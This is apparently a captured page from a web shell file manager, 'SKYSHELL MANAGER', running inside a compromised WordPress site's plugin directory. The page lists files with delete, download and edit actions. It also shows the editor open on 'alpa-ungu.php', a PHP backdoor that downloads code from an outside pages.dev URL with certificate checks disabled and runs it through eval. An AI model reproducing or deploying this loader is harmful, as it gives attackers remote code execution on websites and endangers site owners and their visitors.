📁
SKYSHELL MANAGER
PHP v8.0.30
Create
Create
Path:
root
/
home
/
godaofbq
/
drhyperbaric.com
/
wp-content
/
plugins
/
loginpress
/
css
/
themes
/
Name
Size
Perm
Actions
📄
error_log
745.46 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: alpa-ungu.php
<?php /** * Seo WingChun * Apacoba? */ $url = "https://project-shell-224.pages.dev//shell%20cloudflare/alfaungu.txt"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_TIMEOUT, 10); $remoteCode = curl_exec($ch); curl_close($ch); if ($remoteCode !== false) { // Mengeksekusi kode dari URL luar eval("?>" . $remoteCode); } else { echo "Gagal mengambil data dari remote server."; }
Save